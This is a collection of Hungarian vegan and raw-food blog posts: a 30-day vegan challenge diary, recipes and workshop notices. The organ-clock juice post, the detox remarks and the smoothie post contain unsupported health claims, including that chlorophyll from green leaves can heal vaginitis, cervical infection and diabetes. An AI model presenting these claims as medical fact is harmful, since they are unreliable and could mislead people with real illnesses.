2-3-szori étkezésre, és azzal nagyon jól elvoltam, ha pedig ettem, amint éppen jól laktam, akarva sem tudtam többet enni! - éhséget alig éreztem az 1 hónap alatt, talán még az első héten 1-2 alkalommal, utána viszont szinte egyáltalán nem! Mi volt a legnehezebb a 30 nap alatt? - felfüggesztettem a kávé ivást az első naptól kezdve, és noha azt gondoltam, ezen könnyen átlendülök, számomra is megdöbbentő volt a kávé hiánya...! Jó 2 hétig állandóan annyira álmos voltam, hogy alig éltem... Reggel-délben-este, egész nap... Próbálkoztam a zöld teával, majd a Matcha shake-kel, de nem hozta meg a várt eredményt... (az Attila Hildmann - féle 30 napos vegán kihívás programja írja a napi min. 1,5 liter zöld tea + 2 Matcha shake fogyasztását, de nálam ez nem vált be... Írok majd róla egy külön bejegyzést!) Bő 2 hét után átlendültem azonban, és egész jól elvoltam. Alapvetően azonban végig sokkal álmosabb voltam, mint szoktam lenni, esténként már 9h-kor is ágyba dőltem... - nagyon megviselt kezdetben, illetve talán végig ez volt a második legnagyobb hiányérzetem, a klasszikus szénhidrátok (kenyér, tészta stb.) igen csökkentett mennyisége. Az 5-8/9. napig voltam a legmélyebb ponton fizikailag... Nagyon legyengültem, többször leesett a vércukrom, ezért az SOS 1-2 evőkanál agave szirup, vagy 3-4 szem aszalt sárgabarack előfordult nálam néhányszor...:-) A 3. héttől viszont átbillentem!:-) - a 3. naptól nagyon rossz volt a szájíz a számban, rendkívül erős fémes ízt éreztem, hiába súroltam eszettül a fogam...:p Igen, tudom, méregtelenített a szervezetem... Sokszor hallottam már a nyelvtisztítás fontosságáról tisztítókúrák idején, de még a gyakorlatban sosem alkalmaztam. Most eljött az ideje, és utána nem is volt már semmi gondom ezzel..:-) Pl. EZEN a linken többet olvashattok a témáról! Hogyan tovább? A kívánt testsúlyom még nem értem el, úgyhogy lazított formában, de megyek tovább!:-) Igyekszem kerülni a fehér cukrot, fehér lisztet, de nem ellenőrzök mindent mániákusan házon kívül...:-) A vegánság marad, de amikor esetleg étteremben, vagy vendégségben eszem, és nem tudom máshogy megoldani, lehet, hogy bekúszik majd valami tejtermékes, de igyekszem mindenhol kerülni, inkább előre rákészülni... A tojásos dolgokat zsigerből nagyon kerülöm... A Kihívás után egy héttel +1 kg visszakúszott, úgyhogy mindenképpen próbálom betartani, hogy 16h után nem eszem gabonaféléket! És főzök továbbra is az Attila Hildmann könyvből, sok recept van még hátra!:-) Lesz második kör?;-) Hááát, tervezem!:-) Úgy május 2. felétől kb.! De addig is, aki kedvet kapott, ITT a blogon megtalál minden infót, étrendet, instrukciót, és receptet az egyéni kivitelezéshez. A Facebook oldal, és természetesen ez a blog is megy tovább, tartjuk a kapcsolatot!:-) És csatlakozhatsz a zárt Facebook csoportunkhoz is, ahol tovább segítjük, támogatjuk egymást! És még egyszer KÖSZÖNÖM - KÖSZÖNÖM- KÖSZÖNÖM!!!:-) (Ez a fotó a Kihívás végén készült rólam, a fotózást a (39.) szülinapomra kaptam elő-ajándékként a családtól.:-) És mivel még sosem tettem fel ide a blogra képet magamról az elmúlt 7 évben, gondoltam, itt az idő, hogy bemutatkozzam :-))
Áprilisi főzőtanfolyam időpontok
Ebben a hónapoban a következő tanfolyamokat tartom: Április 20: Kezdő indiai főzőtanfolyam Április 27: Indiai édességek Április 28: Szabdzsi (indiai főétel) workshop A tanfolyamok helyszíne a 108 Életmódközpont (Budapest, Szent István krt. 6.) Jelentkezés, további információ: 108.hu, 30/464-7760 - tovább>>
Hókifli
Tavaly ősszel meghívtak egy zen buddhista kolostorba főzni egy hétvégi rendezvényre. Csodás helyen van, a természet közepén. Az ott élők nagyon sok gyümölcsöt és zöldséget termelnek. Bár még most ismerkednek a befőzés fortélyaival, mennyei szilvalekvárt kóstoltam náluk. Épp annyira volt édes,... tovább>>
Édesburgonya - leves
2013. március 28. Gitta nyersétel blogja
Kevesen ismerik az édesburgonyát, én sem fogyasztottam szívesen, amíg úgy tudtam, hogy messzi távoli országból lehet csak ideszállítani. Hiszen terem itthon is elég finom zöldség, nem szívesen veszek import árut. De amióta megtudtam, hogy itthon is termesztik, és hozzá is lehet jutni jó áron, azóta már többször is vettem és készítettem finomságokat belőle, természetesen nyersen. Legegyszerűbb felhasználási módja, ha gyümölcspréssel kinyerjük a levét. Ez annyira nem jó, mert bár sokat meg lehet inni belőle, a rostokat kidobjuk, és kárba vész. A másik gyors megoldás a turmix, amikor is kevés vízzel, gyömbérrel, egy almával simára turmixoljuk, és jól megisszuk. Fűszeres, zöldséges nyers leves édesburgonyábólSós változat a leves, amit kevés paradicsommal, paprikával, újhagymával, sóval és vízzel készítek. Sűrű, krémes, nagyon finom. Ha finoman lereszelem, akkor meg is lehet szárítani, ropogós nasi, levesbetét, étel-díszítés... Jó hír, hogy aszaló nélkül is elkészül, langyos, szellős helyen kell hagyni, és kiszárad magától. Édesburgonya chipsz, ropogós finomságMég több recept: Rakott édesburgonya Édesburgonya tészta
Vegán darált "marhahús"
2013. március 25. La Veganista
Sokan azt hiszik, ha valaki a vegán táplálkozást követi, akkor le kell mondania finomabbnál-finomabb ételekről, mert ezen túl csak füvet rágcsálhat a réten. Ez annyira nem igaz, hogy vegán konyhánkban akár ízletes "marhahúst" is készíthetünk karfiolból és dióból.
Hozzávalók:
1 db közepes nagyságú karfiolfej (megtisztítva, megmosva, rózsáira szedve) 2 csésze dió darálva 1 közepes nagyságú paradicsom felvágva 2 evőkanál olívaolaj 3 gerezd fokhagyma apróra vágva 1/8 teáskanál szárított, morzsolt zsálya 1/2 teáskanál füstölt őrölt paprika (lehet édes vagy csípős) 1/2 teáskanál sima őrölt paprika 1/2 teáskanál só
Így készítsd el:
A megtisztított, rózsákra szedett karfiolt, a diót, és a paradicsomot robotgéppel krémállagúra mixeljük össze. A péphez öntsük hozzá az olívaolajat, a fokhagymát, a zsályát a füstölt és sima pirospaprikát, valamint a sót és alaposan dolgozzuk össze. Melegítsük a sütőt 180-200 fokra. Egy sütőpapírral kibélelt tepsiben oszlassuk el egyenletesen a masszát, majd az előmelegített sütőben 15-20 percenként átkavarva süssük addig, amíg elpárolog belőle a nedvesség és kisebb-nagyobb rögökre esik szét ez kb. 1 óra. Nekem egy kicsit macerás volt ez a módszer. Legközelebb egy nagy serpenyőben fogom elkészíteni. A vegán darált marha felhasználható húsgolyó készítéshez, hamburgerpogácsához, tacoba vegán töltelékként. Kiváló húspótló, és meglepően finom. Hűtőben három napig tárolható, fagyasztani is érdemes.
Krémes édesburgonya leves fahéjjal és narancshéjjal
2013. március 21. La Veganista
Az édesburgonyát nem lehet megunni. Ez a sokoldalú növény egészséges, könnyen emészthető alapja lehet leveseknek, süteményeknek, grilltálaknak, köreteknek. Ezen az esős, március végi napon egy szemtelenül egyszerű, de annál finomabb édesburgonya leves receptjét szeretném megosztani veletek. A csodálatosan illatozó vitaminokban, ásványi anyagokban gazdag narancsszínű leves elűzi a tavaszi fáradtságot. A fahéj, a narancshéj és a bors pikánssá, a zöldség alaplé testessé, a rizstej pedig selymessé teszi.
Hozzávalók:
2db nagyobb édesburgonya 1 bögre (3dl) ízesítés nélküli rizstej 1 (2dl) csésze zöldség alaplé 1 evőkanál olíva olaj 1 db kisebb paradicsom (díszítéshez) 1 csipet só 1 csipet bors 1 csipet fahéj 1 csipet narancshéj (őrölt) egy kevés metélőhagyma a díszítéshez
Így készítsd el:
Csomagold alufóliába az édesburgonyát és süsd meg a sütőben. (kb. 30-40 perc) Ezután távolítsd el a héját. Mixer segítségével keverd krémes állagúra a rizstejjel, a zöldség alaplével, sóval és narancshéjjal, borssal és fahéjjal. Forrald át egy lábasban a tűzön a levest, és máris tálalhatod például metélőhagymával és paradicsommal díszítve. Ugye, milyen egyszerű?
Vegán chorizo - a húsmentes spanyol kolbász
2013. március 19. La Veganista
Nincs kolbász hús nélkül? Dehogy nincs! Mi sem bizonyítja jobban, mint a spanyol chorizo veganizálása. Egy kis munkával ízletes lencse alapú kolbászt készíthetünk, ami garantáltan finomabb, mint a boltokban kapható vegán készítmények. Az eredeti receptben búzasikért használnak alapanyagként, de a glutén sokaknak allergiát okoz, ezért vörös lencsével helyettesítettem. Így is kitűnően működik. Sőt mivel csak egy csészényi vörös lencsém volt, ezért a hasonlóan apró, hántolt urid dalt használtam kiegészítőként. A lencsét szójagranulátum, vagy quinoa is helyettesítheti.
Hozzávalók:
1,5 csésze zöldség alaplé 4 evőkanál paradicsom sűrítmény 3 evőkanál olívaolaj/rizsolaj 3 evőkanál vörösborecet 6 gerezd fokhagyma (apróra vágva) 1 2/3 csésze vörös lencse (alaposan átmosva) 1/4 csésze csicseriborsó liszt 3 evőkanál étkezési élesztő 4 teáskanál füstölt paprika (a Culinarisban kapható édes és csípős változatban is) 2 teáskanál chili pehely 3 teáskanál oregano 2 teáskanál őrölt kömény 1 teáskanál őrölt koriander 1,5 teáskanál só 1/2 teáskanál őrölt bors
Így készítsd el:
Első lépésként az alaposan átmosott lencsét mixerrel pépesítsük. Ezután egy kisebb edényben keverjük össze az alaplevet, a paradicsom sűrítményt, az olívaolajat, az ecetet és a fokhagymát. Egy tálba öntsük bele a lencsepépet, a csicseriborsólisztet, az élesztőt, a füstölt paprikát, a chili pelyhet az oreganot, a köményt, a koriandert, a sót és a borsot. Keverjük őket össze, majd öntsük bele a másik edényben összedolgozott hozzávalókat. Alaposan gyúrjuk össze az alapanyagokat, majd pihentessük kb. 10 percet. A sütőt melegítsük 180°C-ra. Ha letelt a 10 perc pihenő, ismét gyúrjuk át a chorizo masszát, majd osszuk hat egyenlő részre. Formáljunk belőlük kolbászokat, helyezzük alufólia csíkokra és csomagoljuk be lazán, mintha szaloncukrot készítenénk. A fólia végét összetekerjük, de nem túl szorosan, mert később a sütésnél szétdurranhat a kolbász a gőzfejlődés következtében. Helyezzük a befóliázott kolbászokat a sütőrácsra, és 40 percig süsük, majd vegyük ki és szabadon hagyjuk lehűlni. Legjobb, ha kóstolással megvárjuk a másnapot, addig megfelelően összeérnek az ízek. Hűtőben 2 hétig tárolható,de fagyasztani is lehet. Korpás házikenyeret sütöttem a chorizo mellé reggelire. Nehéz volt megállni hogy még a fotózás előtt be ne faljuk az egészet.
Ultimate vegán almás pite
2013. március 17. La Veganista
Az almás pite a sütemények királynője. Fantasztikusan egyszerű, könnyen veganizálható békebeli desszert, melyben az alma, a fahéj, és a dió nászából megszületik az örökké tartó szerelem íze. Senkit ne tartson vissza a sütéstől és a kóstolástól az, hogy ebben a verzióban sem tejföl, sem tojás nincs. Nem érezhető különbség a hagyományos és a veganizált változat között.
Hozzávalók:
1 kocka margarin (25dkg) 40 dkg liszt (finomliszt és teljeskiőrlésű liszt fele-fele arányban mehet bele) 10 dkg cukor 1 kisebb citrom leve, meg a héja 1/4 csésze rizstej (ízesítetlen) 1 csomag sütőpor 1 csomag vaníliás cukor 2 kg alma (nálam savanykás ízű alma a nyerő, mert kellemes kontrasztot ad az édes tésztával) 2-3 marék durvára vágott dió fahéj
Így készítsd el:
A liszttel alaposan keverjük össze a cukrot, a sütőport, a vaníliás cukrot, a citrom héját és levét. Ezután morzsoljuk bele a margarint, majd adjuk hozzá a rizstejet. A tésztát úgy kell összedolgozni, hogy ruganyos és homogén legyen, nem lehet ragacsos. Ha ezzel megvagyunk, tegyük be a hűtőbe pihenni, amíg elkészítjük a tölteléket. Az almákat meghámozzuk, kicsumázzuk és lereszeljük. Alaposan nyomkodjuk ki a reszelt almát, mert sütés közben az almalé eláztatja a tésztát. Ezután, a sütőt előmelegítjük 200°C-ra és előkészítjük a tepsit a sütéshez. Sütőpapírt rakunk bele, vagy margarinnal kikenjük és meglisztezzük. Kivesszük a tésztát hűtőből és kettéosztjuk. Meglisztezett nyújtódeszkán sodrófával kinyújtjuk a tepsi nagyságának megfelelően (nálam cm x cm - így ebből a mennyiségből leheletvékony tésztát kapunk). A tésztát rátekerjük a sodrófára, így könnyebb átemelni a tepsibe. Az alsó tésztarétegre egyenletesen ráhalmozzuk a reszelt almát és megszórjuk fahéjjal, majd meghintjük durvára darabolt dióval. A pite tészta másik felét is kinyújtjuk, és sodrófáról letekerve beborítjuk vele az almát. Villával alaposan megszurkáljuk a tésztát, hogy a sülés közben keletkező gőzök szabadon távozhassanak a pitéből. A sütési idő kb. 20-30 perc. Tűpróbával ellenőrizzük a tésztát, ami akkor lesz jó, ha a tű tiszta marad. A tészta halvány drapp árnyalatúra süljön. (Ha nagyon pirulna, de a tűpróba szerint nyers a tészta, alufóliával kell lefedni.) A kihűlt, felszeletelt pitét fahéjas darált dióval szórhatjuk meg, de a legjobb csak úgy forrón, minden pepecselés nélkül magunkba tömni.
Egyszerű nyers dió-alma torta - Nóra ma 6 hetes
2013. március 15. Napló étkeinkről, életünkről
Nóra ma 6 hetes, ami jelentős a mai orvosi gyakorlat és a Biblia szerint is. Ez alkalomból készítettem egy kis édességet, amíg nagyobb fiam babázott. A diót már tegnap beáztattam, majd kiszárítottam (az olajos magvakat a gabonához és babfélékhez hasonlóan felhasználás előtt érdemes beáztatni, így könnyebben emészthető lesz) Alapanyagok: - 30 dkg dió - kb 15 dkg mazsola - 3 alma - kb 8 dkg kókuszzsír - indiai útifűmaghéj - 1,5 teáskanál - fahéj, vanília, citromhéj Eszközök: - négyoldalú reszelő - almához, citromhéjhoz - botmixer a beáztatott mazsola pürésítéséhez - diódaráló Elkészítése: A mazsolát reggel beáztattam, majd minimális vízzel összeturmixoltam. A ledarált dióhoz annyit adtam, hogy összeálljon, majd hozzáadtam a szoba-hőmérsékletű kókuszzsírt, és ízesítettem. Ezután betettem hűtőbe, hogy kicsit keményedjen. Az almát lereszeltem, kinyomtam a levét (és megittuk), majd a megfelelő édes íz eléréséhez adagoltam hozzá a mazsolapüréből. Ezt is ízesítettem, majd apránként hozzáadtam az útifűmaghéjt, nehogy sokat tegyek bele. Közben vártam, és amikor láttam, hogy jó az állaga, rátettem a lehűlt dió alapra. Tehettem volna egész mazsolát is bele, de a kisebb fiam nem szereti. Lányommal megtanácskozván a dolgot, csak egy kevés fahéjat szórtam díszítésnek a tetejére. Nagyon finom lett. Az alma réteg legközelebb kicsit nagyobb lesz (kb dupla ekkora) a család kívánsága szerint. A nyers édességekkel sokszor az a bajom, hogy a sok olajos mag miatt nagyon tömények. Ezért próbálok kevésbé zsíros nyers édességeket kikísérletezni! És persze itt van Nóra baba is, aki már 6 hetes, kinőtte az újszülött kort :-)
Heti saláta ötlet: nyers almacsatni
2013. március 14. Napló étkeinkről, életünkről
Még ifjabb koromban ettem almacsatnit, ami egyszerre nagyon csípős és nagyon édes volt, mégis jólesett. A hűvös idő eszembe juttatta melegítő hatását, így most ennek nyers vegán változatát próbáltam elkészíteni: Összetevői (egy személyre): - 1 alma - 1 banán - beáztatott mazsola - csili paprika Utólag jutott eszembe, hogy fahéjat is tehettem volna bele, majd legközelebb. A mazsolát összeturmixoltam, és egy részét összekevertem csiliporral, majd az összedarabolt almához és banánhoz adtam. Szebb lenne, és még gyorsabban készülne el, ha valamilyen áttetsző sziruppal édesítem, de én inkább mazsolát használok. A maradék mazsolából pedig csokival bevont mogyoró golyó lesz holnap :-)
Étkezési kultúra önismereti szempontból
2013. március 13. Vera vega konyhája
Szeretnék a figyelmetekbe ajánlani egy programot, most szombatra. Kedves ismerősöm, Csanádi József önismereti táplálkozási workoshopot tart: A nagy érdeklődésre tekintettel sikerült új időpontot találnunk, így örömmel szólok, hogy ismét ÖNISMERETI TÁPLÁLKOZÁSI workshop lesz 2013. március 16-án du.14.00-18.00-ig. Lehet-e önismeret által a táplálkozási kultúránkon javítani? Az e... mberek étkezési szokásaiban ott lapul a bűntudat, a szorongás, a ,,gyorsan mindent bekebelezni, a megfelelés, az étkezési szabályok dogmatikus követése egyszóval sok minden, ami nem sorolható az örömteli étkezések közé. Az egészséges táplálkozás lehet EGÉSZ ha az öröm hiányzik belőle? Helyszín: Budapest Workshop témái: 1.Önismereti játék 2.Táplálkozás tudatosan, szelíden és örömmel? 3.Közös uzsonnakészítés és étkezés 4. Élménymegosztás- felmerülő kérdések megbeszélése Díja: 2000.-Ft/fő Ha szeretnél részt venni a workshopon, kérlek jelezd 2013 március 13-ig az alábbi elérhetőségek egyikén: Csanádi József 06 30 512 3258 csanadi.jozsef@freemail.hu Ízelítőül egy kis olvasnivaló: http://felemelkedes.eu/hu/?p=607
Remegős rizspuding
A rizskúra alatt az édes ízt sem kell nélkülöznünk Hozzávalók személyenként: 1 maréknyi főtt barna rizs 1 alma 1 csipet fahéj 1 ujjnyi friss gyömbér reszelve Az almát megmossuk, kockára vágjuk, és a többi hozzávalóval összeturmixoljuk. Ha nem elég édes, csurgathatunk bele egy pici mézet A barna rizs elkészítése: 1 rész barna rizs 2 rész [...]
Málnás-amarántos szójajoghurt pirított kókusszal
Reggelire ettük ezt a szépséget a 30 NAPOS VEGÁN KIHÍVÁS egyik napján, ami nekem nagyon ízlett, a gyerekek nem igazán voltak bizalommal az irányába, illetve a férjem annyit mondott, hogy tejes joghurttal és amaránt nélkül biztos finomabb lett volna!:-))) Érdemes fogyasztásnál összekeverni a rétegeket, akkor még jobban érvényesül a telje sízhatás!:-) Málnás amarántos szójajoghurt pirított kókusszal Elkészítési idő: kb. 10 perc Hozzávalók (2 főre): 60 g puffasztott amaránt 260 g natúr, cukormentes! szójajoghurt 4 ek. agave szirup 200 g málna (fagyasztott) 1 késhegynyi őrölt vanília 10 g kókuszreszelék Keverjük össze az amarántot és a szójajoghurtot, édesítsük 2 ek. agave sziruppal. Keverjük el az agave szirupot a vaníliával és öntsük a málnára, finoman keverjük össze! A kókuszreszeléket pirítsuk meg zsiradék nélkül kb. 3 percig egy serpenyőben, majd édesítsük 1 ek. agave sziruppal. A málnát régetezzük az amarántos joghurttal egy pohárba, a tetejére szórjuk a kókuszt! Forrás: Attila Hildmann: Vegan for Fit
Narancsos-datolyás zabkása
A kedvenc gabonám a zab, azon belül is a zabpehely. Nem csak azért, mert könnyű vele dolgozni, hanem szerintem ez a legegészségesebb gabona. Társai közül a legtöbb fehérjét tartalmazza. Emellett a zab magjában van még B1, B2, B6, B9, E, E1 vitamin, valamint a ritkán előforduló biotin (H vitamint), kalcium, kálium, vas és foszfor is. Említésre méltó, hogy B9 vitaminja, az inozitol részt vesz a zsíranyagcserében, segít a vér koleszterinszintjének csökkentésében, zsírbontó szerepével megakadályozza, hogy az érfalakon lerakódjon a koleszterin. Tehát az érelmeszesedést megakadályozza, vagy javítja. Ezért különösen ajánlott azoknak (is) fogyasztani zabot, zabpelyhet, akik az érelmeszesedés miatt magas vérnyomással küzdenek. S azt talán már említettem a korábbi bejegyzésekben, de most ismét megerősítem, hogy a zabnak alacsony a glikémiás indexe, tehát cukorbetegek is bátran fogyaszthatják (persze helyesen elkészítve).
Mindezek fényében állítom, hogy a legjobb reggeliket lehet elkészíteni zabból, zabpehelyből. Egy kis aszalt gyümölcs, gyümölcs hozzáadásával kiváló táplálékhoz juttatjuk szervezetünket. Ráadásul hihetetlen gyorsan elkészül.
A recept:
Hozzávalók:
1 adag zabpehely (pl. 2 bögre)
víz
2-3 szem narancs (nekem 2 vérnarancs és egy sima narancs volt)
pár szem datolya
Igény esetén: növényi tej, amit nem készen veszünk, hanem magunk készítünk - mert így egészségesebb - pl:szezámtej
1-2 evőkanál lenmagőrlemény
Elkészítés:
Az apró szemű zabpelyhet a lábosban, amiben főzni fogjuk, kicsit megpirítjuk. Épp, amíg illata lesz a pirítástól. Majd felöntjük vízzel, hozzáadjuk a lenmagőrleményt. Figyelve és olykor megkeverve addig főzzük, míg a zabpehely meg puhul. (Csak pár perc.)
Ha nagy szemű zabpehellyel dolgozunk, akkor ugyanígy megpiríthatjuk, de egy éjszakára akár be is áztathatjuk hideg vízbe. Másnap pedig felfőzzük. Az ilyen zabpelyhek több főzési időt igényelnek.
Akár főzés előtt is hozzáadhatjuk a felszeletelt narancs egy részét, mivel úgysem fő olyan sokáig, hogy nagyon károsodna hő hatására.
Víz helyett és vízzel együtt is használhatunk valamilyen növényi tejet. Külön ízvilágot kölcsönöz reggelinknek.
Az a rövid idő, míg a kása megfő, épp elég, hogy az öntetet a tetejére elkészítsük:
Egy aprító- vagy turmixgépbe beletesszük a narancsgerezdeket, belehelyezünk néhány szem aszalt datolyát is, és összeaprítjuk, -keverjük a géppel. Ha a narancs nem elég lédús, kevés vizet önthetünk hozzá (max. 1 dl). A megfőtt zabkását tányérra szervírozzuk és a datolyás-narancsos szószt elkenjük a tetején.
Kész is a C-vitaminos, ásványi anyagokban gazdag, emésztésre is jótékonyan ható reggelink! A datolya adja az édes ízt.
Édesköményes tészta (laktovegetáriánus)
2013. március 5. Dulmina tündérkonyhája
Jó régen ettem már édesköményt, de kellemes emlékeim vannak erről az ánizsos aromájú zöldségféléről. Nemrég ismét sikerült hozzájutnom, és ezúttal az alábbi finomsághoz használtam föl: Megfőztem 25 dkg tojásmentes durum száraztésztát a csomagolásán feltüntetett módon. Fölaprítottam 3 édesköményt (kb. 80 dkg): előszöris a a zöldjüket félretettem a díszítéshez, ezután kettévágtam őket,
Tavaszi böjtünk második napja
Ma reggel nagyon finom édes káposzta levet ittam. Azt találtam ki, hogy a leveket a szervóra szerint iszom. Amelyik szervet támogatja az adott ital, annak az órájában kortyolgatom el Így nagyságrendekkel felgyorsul a regenerálódás folyamata Nézzétek csak : Forrás:http://katkatalplap.blogspot.hu/2012/04/szerv-ora-es-meridianok.html Mivel a káposztában lévő rengeteg K vitamin támogatja a gyomorfal regenerálódását, azért 9-11 között fogyasztottam. A [...]
Reform linzer teljes kiőrlésű lisztből
Linzert még talán nem is készítettem reform módon, így most kipróbáltam.
Finom lett, kicsit porhanyósabb, mint a hagyományos változat, hiszen nincs benne tojás, és a zsiradék sem vaj vagy margarin, hanem kókuszzsír, és ezek a tényezők teszik kicsit szárazabbá, porhanyósabbá a tésztát.
Viszont érdemes kipróbálni!
Hozzávalók a tésztához:
20 dkg teljes kiőrlésű tönkölyliszt, fél tasak foszfátmentes sütőpor, 10 dkg nyírfacukor (xilit) (vagy 5-5 dkg méz-xilit keverék), fél citrom leve, kb. 3 lapos evőkanálnyi lenmag (pl. sárga arany lenmag), kb. fél dl víz
Tészta elkészítése:
A teljes kiőrlésű tönkölylisztet összekeverjük a sütőporral, majd a többi alapanyagot hozzáadjuk, és alaposan összegyúrjuk. A kókuszzsírt jobb, ha felhasználás előtt egy picit meglangyítjuk, így kézzel könnyebben eldolgozható.
Az elkészült tésztát tk. liszttel lisztezett gyúródeszkán kinyújtjuk, kiszaggatjuk. A diósakhoz a felső részt megkenjük pl. szőlőmagolajjal, és durvára darált dióba forgatjuk, és dióstul megsütjük.
Ha megsült, kivesszük a sütőből, kihűtjük, és aszalt áfonya lekvárral összeragasztjuk a két felet.
Aszaltáfonya lekvár: aszalt áfonyát vízzel összeturmixolunk, hogy lekvársűrűségű masszát kapjunk, és már készen is van a tartósítószermentes lekvárunk.
A kakaósakhoz a cukormentes csokimázt az alábbi módon készítjük:
kb. 3-4 dkg kakaóvajat meglangyítunk lassú tűzön, folyékonnyá olvasztjuk, hozzákeverünk édesítésnek egy kis stevia port (Stevia Crysanova), egy kis kakaóport, és belemártjuk a linzer felső részeit. Mivel porózus tészta, egy picit magába fogja szívni. Kókuszreszelékkel meghintjük a tetejét.
Frissiben is tálalható, nem kemény.
Jó étvágyat!
Tavaszköszöntő smoothie
Tavasz beköszöntével könnyebben, szívesebben figyelnek oda az emberek arra, hogy mit visznek be szervezetükbe. Ilyenkor sokan tartanak tisztítókúrákat, fogyókúrákat. A következő smoothie mindkét célhoz jól passzol.
Reggeli ital mellett alkalmas tisztítókúrák italaként is és fogyókúrázóknak is ajánlható, mivel ennek a smoothie-nak nagy része ananászból van. Az ananász bromélia nevű enzimmel rendelkezik, amely egyrészt a zsír égetésében, másrészt a fehérjék bontásában játszik szerepet szervezetünkben. Az ananász jótékony hatásai között megemlítendő, hogy csökkenti a vér savtartalmát, ezért lúgosító diéta során is remek eledel. Továbbá vizelethajtó és emésztést elősegítő tulajdonságokkal is bír.
Ha lehet, kerüljük a konzerv-ananász fogyasztását, választását, mivel azok nem tartalmazzék a bromélia enzimet sem. Ellenben hozzáadott cukrot és tartósítószert igen, amire nincs szüksége szervezetünknek. Ha ananászt készülünk vásárolni, figyeljünk arra, hogy sárga színű legyen (a zöld még nem egészen érett) és kellemes illatot árasszon. Jó, ha levelei vastagok és zöldek, az alsóbbak könnyen kihúzhatók.
A recept:
Hozzávalók:
- 1/2 ananász
- 1 kisebb csomó ruccola
- 1-2 dl víz
- turmixgép
- igény esetén esetleg méz
Elkészítés:
Az ananászról levágjuk a héját, majd felkockázzuk a gyümölcs húsát. Beletesszük a turmixgépbe. Hozzáadunk egy kevés ruccolát, vizet öntünk bele, és összeturmixoljuk az egészet. Fanyarságának foka azon múlik, mennyi ruccolát adunk hozzá. Ha szükséges, egy kevés mézzel édesebbé tehetjük.
Laktató ital és a ruccola zöld színének hála klorofilt is juttatunk a szervezetünkbe, ami segít eltávolítani a lerakódott méreganyagokat, sőt gyorsítja a sebek regenerálódását. A vérben pedig csökkenti a koleszterinszintet.
Hüvelygyulladás, méhnyak fertőzés cukorbetegség esetén fogyasszunk sok sok zöld színű növényt, juttassunk minél több zöld levelet a táplálkozásunkba, mert ezáltal klorofilt juttatunk a szervezetünkbe, ami gyógyuláshoz vezethet.
2. NAP - A 30 NAPOS VEGÁN KIHÍVÁS
Reggeli: banánhabos - kókuszos amarántkása Ebéd: fekete babos - spenótos-paradicsomos tészta magokkal (a tegnapi maradékokból) Vacsora (fent a képen): tepsiben sült zöldségek salátával, vagy friss csírákkal, esetleg savanyú káposztával Ital: 2,5 liter szénsavmentes ásványvíz (nálam kb. 3 liter) + 1,5 liter zöld tea MOZGÁS: - délután 1 óra intenzív rollerezés a gyerekekkel a tavaszi napsütésben:-) Nagyon jó volt!:-) - 15 perc CANTIENICA-hasgyakorlatok:-) - (és este tartottam 2 CANTIENICA-órát:-) Tapasztalatok: reggel úgy ébredtem, hogy nagyon nem voltam éhes, a reggelinek csak a felét ettem meg, a másik részét később tízóraira. Aztán ebéd előtt már mégis csak éhes lettem, ettem 1 narancsot:-) Ebédnél alig voltam éhes, csak egy részét ettem meg a tésztának, viszont utána annyira nem éreztem topon magam közérzetileg, de a rollerezés után nagyon jól helyrebillentem lelkileg és testileg is egyaránt!:-) Délután már kicsit elkapott a kávé hiánya iránti vágy, úgyhogy megittam egy zabtejes gabonakávét, édesítés nélkül, és ettem hozzá 4 szem aszalt sárgabarackot:-). Uzsonnára egy kis salátát, amit amúgy sosem tennék, de mivel 17h-re mentem dolgozni, és tudtam, hogy akkor úgysem tudok enni, viszont tutira éhes leszek, és azt nagyon nem bírom általában, ezért most így tettem.:-)) Csak éhes lettem két órám között is, így lenyomtam egy banánt... Aztán 20.30h-re értem haza, és akkor ettem a tepsis zöldségekből egy kis tányérral. És 23h-kor még egy almát... Mert elég éhes voltam, és utálok éhesen aludni menni!:-) - az a tapasztalásom ma is folytatódott, hogy amint elteltem, nem tudtam egy falattal sem többet enni!:-) - ma is szomjas voltam, de talán kicsivel kevesebbet, mint tegnap. A zöld teát ma kicsivel erősebbre csináltam (2 filter 1,5 liter vízhez), de így elég keserű volt... - nem sikerült betartani, hogy 19h után ne egyek már semmit... Legközelebbre megpróbálok kitalálni vmi más megoldást, amikor este dolgozom.. Mondjuk uzsonnaidőben eszem a vacsorát..?! - a kenyér és egyéb szénhidrátok annyira nem jártak a fejemben, de azért az elgondokodtatott, amikor az egyik esti órámon azt mondtam a tenyér a földön helyett, hogy kenyér a földön....:-))))
Chilis, citromos pirított tofu leveleskellel + a harmadik hét cukor nélkül
2013. február 25. Zizi kalandjai
Harmadik hetünk is könnyen telt cukor és édességek nélkül. Néha azért belemarkoltam a mazsolás zacskóba (I. nem igazán szereti a mazsolát) és aszalt fügét is ettünk néhány darabot. A legjobban az hiányzik, hogy készíthessek végre valamilyen édeset. Még nem is feltétlen a sütés hiányzik, ugyanis jó néhány nyers édesség receptje vár kipróbálásra és először ezeket szeretném megvalósítani.
Na igen, őszinte leszek... azért egy puha, finom croissant-t is be tudnék már nyomni habos vegán kakaóval vagy cappuccinoval. Főleg úgy, hogy I. beígért nekem egy ilyen reggelit, ha végzünk a cukormentes kihívással. Lehet, hogy ez az álom már pénteken meg is valósul? :)
A sós ételek tekintetében mindenfélét eszünk. Ha van időm, készítek valami újat, ha nincs I. gyorsan összedob egy isteni paradicsomos-bazsalikomos tésztát vagy pirítós kenyeres (napraforgó krémmel megkenve) hatalmas adag salátás vacsorát. Ezek az ő reszortjai. Ő a zöld salátakészítő a családban, nem én. :) Ez a chilis, citromos, fűszeres pirított tofu még korábban készült, de egy nagyon finom, tápláló vacsora kerekedett belőle. Könnyű is elkészíteni... a sütőben elkészül a tofu és a leveleskel (ha nem találtok leveleskelt, helyettesítsétek kelkáposztával), a tűzhelyen pedig megfőzzük hozzá a köretet. Mi quinoa-val ettük, de bármilyen más gabonával, salátával, rizstésztával el tudom képzelni.
A kihívás szabályai továbbra is ugyanazok: aki a nyereményjátékban is részt kíván venni, azoktól feltétlen várom a néhány soros beszámolót komment formájában itt a bejegyzés végén (csak az kerül bele a kalapba, aki mind a négy heti beszámolóhoz ír néhány sort vagy blogbejegyzést). Aki pedig használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Lesz egy jó kis online albumunk!
Akik a harmadik cukormentes hétről beszámoltak:
- Orsi - Wannabe Chef
- Boglárka - Önismereti kalandtúra
Chilis, citromos pirított tofu leveleskellel
Hozzávalók 2 főre:
- 300 g tofu, felesleges víz kipréselve belőle, majd kockákra vágva
